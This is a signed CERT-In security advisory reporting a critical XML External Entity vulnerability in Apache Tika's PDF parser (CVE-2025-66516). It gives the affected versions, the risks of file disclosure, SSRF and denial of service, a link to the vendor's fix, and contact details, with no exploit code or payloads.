—–BEGIN PGP SIGNED MESSAGE—–

Hash: SHA256

XML External Entity (XXE) injection vulnerability in Apache Tika 

Indian – Computer Emergency Response Team (https://www.cert-in.org.in)

Severity Rating: CRITICAL

Software Affected

Apache Tika Core Versions 1.13 through 3.2.1

Apache Tika Parsers Versions 1.13 before 2.0.0

Apache Tika PDF parser module Versions 2.0.0 through 3.2.1

Overview

A vulnerability  has been reported in Apache Tika, exploitable via its PDF parsing functionality, which could allow an attacker to access sensitive data or trigger Server-Side Request Forgery (SSRF) on the affected system.

Target Audience:

All organizations and individuals using Apache Tika.

Risk Assessment:

High risk of sensitive data disclosure and Server-Side Request Forgery (SSRF).

Impact Assessment:

Potential of unauthorized access to local files, Server-Side Request Forgery (SSRF) against internal or external services, and denial-of-service (DoS) conditions.

Description

Apache Tika is a content analysis toolkit designed to detect, parse, and extract text and metadata from a wide range of file formats for indexing, search, and data processing applications.

A critical vulnerability exists in Apache Tika due to improper restriction of XML External Entity (XXE) references in its PDF parsing functionality. An attacker could exploit this vulnerability by processing a crafted PDF file containing malicious XFA content.

Successful exploitation of this vulnerability could allow an attacker to access sensitive data or trigger Server-Side Request Forgery (SSRF) on the affected system.

Solution

Apply appropriate updates as mentioned by the vendor

https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k

Vendor Information

Apache Tika

https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k

References

Apache Tika

https://lists.apache.org/thread/s5x3k93nhbkqzztp1olxotoyjpdlps9k

CVE Name

CVE-2025-66516

– —

Thanks and Regards,

CERT-In

Incident Response Help Desk

e-mail: incident@cert-in.org.in

Phone: +91-11-22902657

Toll Free Number: 1800-11-4949

Toll Free Fax : 1800-11-6969

Web: http://www.cert-in.org.in

PGP Fingerprint: A768 083E 4475 5725 B81A A379 2156 C0C0 B620 D0B4

PGP Key information:

https://www.cert-in.org.in/s2cMainServlet?pageid=CONTACTUS

Postal address:

Indian Computer Emergency Response Team (CERT-In)

Ministry of Electronics and Information Technology

Government of India

Electronics Niketan

6, C.G.O. Complex

New Delhi-110 003

—–BEGIN PGP SIGNATURE—–

iQIzBAEBCAAdFiEE6r4Iam/Ey0c/KakL3jCgcSdcys8FAmlBVmAACgkQ3jCgcSdc

ys91Og/+MeNNE9uD7ifIcq5vktaI3LJUqFKGdfUfgMFxJOmdyIiTUGetWEnckW+/

rHMK0cyPx31FFmfidBHR5I9trOa0akAplUUQxuUKZnqDB5oc6NTOaY6h4rHqyaSw

aQwmi+IsiHE4I9tY+TaFROL/bA/JcPxCnhD5zrD/mS81pdLvJ8kcd20qohSTduKv

qRggu6DLzAcVLnD0LPZJ6BdoG5BWYI8OW4GgT5WQCdQ4eZUSm96/gCBOnt7cHLxd

P3gtU7E0NTqLYO1lDAA5lPNmpqHzhlhONyzuI245qfk+KhaagHMuDeI9Kw87yvCH

Y0CooT0840wZlU3NQVs9d8oTqJLwEltMRNU6hRgRoAFRVYwQRbx1HTVGhVgBwFPJ

nAdZdNbaY5khqcxc6yifKq3CeCRsUf5wwxUwhsmgpnhOBgCvKd3Fs/3oWbe/moZx

RWom6jz985Dc9Gz+FNu5kwGba1brMizemzymzZvxWrJQOANgcoQIhLrsHn4dtpeW

0d96aTd43wYJLxqAbOFjys6ZV40tgRKHEERXcXiYO+vooIHCi9cAnAt0mWaXpyQq

9MDtzRWZoDxUJoSkmCq218KKfFrnZXGmJNk49Y2j9yyrfwDIJp9dQEKxy2URVQg8

08h6Aei/DmhfMjNTxiJX9vhVQu4Qj9E476HRk8vyj+K22/Dan+E=

=dC/f

—–END PGP SIGNATURE—–